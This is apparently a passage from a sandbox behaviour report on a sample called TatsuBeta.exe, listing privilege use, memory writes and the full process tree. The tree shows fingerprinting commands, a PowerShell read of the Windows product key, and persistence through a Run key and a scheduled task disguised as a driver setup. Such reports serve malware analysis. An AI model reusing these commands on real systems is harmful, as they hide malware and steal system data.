N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1548 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 1548 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 5028 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 684 wrote to memory of 2508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 684 wrote to memory of 2508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe
PID 5028 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 5028 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 2284 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2284 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5028 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 5028 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 5028 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 5028 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 5028 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 5028 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe C:\Windows\system32\cmd.exe
PID 3700 wrote to memory of 4152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3700 wrote to memory of 4152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1180 wrote to memory of 3440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1180 wrote to memory of 3440 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3440 wrote to memory of 2808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 2808 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1744,11254376664092407796,11918452781272488164,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1960 --field-trial-handle=1744,11254376664092407796,11918452781272488164,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1548 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1548 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1548 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1548 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupmub5Xr /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupmub5Xr /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

